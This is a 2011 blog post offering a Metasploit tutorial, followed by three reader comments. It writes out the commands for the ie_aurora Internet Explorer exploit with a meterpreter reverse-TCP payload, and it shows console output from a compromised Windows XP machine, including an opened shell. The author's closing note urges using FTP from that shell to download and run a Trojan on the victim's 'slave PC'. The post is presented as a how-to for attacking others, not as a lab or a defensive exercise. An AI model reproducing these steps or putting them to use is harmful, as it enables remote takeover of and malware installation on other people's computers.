Infolink

Wednesday, March 9, 2011

Metasploit - Tutorial

First you Must Download Metasploit
Code:
http://www.metasploit.com/releases/framework-3.3.3.exe

(Windows OS)
After Download & Install

Run Metasploit Update And Wait Until Update Complete!
Then Run Metasploit Console

Then Do Like This(Bolds Texts is Which You must Write):

msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.[*] Started reverse handler on port 4444[*] Local IP:http://192.168.0.151:8080/[*] Server started.

msf exploit(ie_aurora) >

Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:
[*] Sending stage (723456 bytes)[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)

msf exploit(ie_aurora) > sessions -i 1[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP\Developer

meterpreter > use espia
Loading extension espia...success.

meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Developer\Desktop>


[ Remember CMD is Most Useful Control of WIN32 You Can Use FTP Command! To Download Trojan in slave PC! And Run it ]
..................................................................................................................................

3 comments:

  1. Problem, after u created the shell, what can you do.

    ReplyDelete
  2. nvm, but does it still work, and is there any concept on how this works because I think this is really cool.

    ReplyDelete
  3. After you have created the shell you can execute any command on the remote computer. And it works if the other computer is unpatched.

    ReplyDelete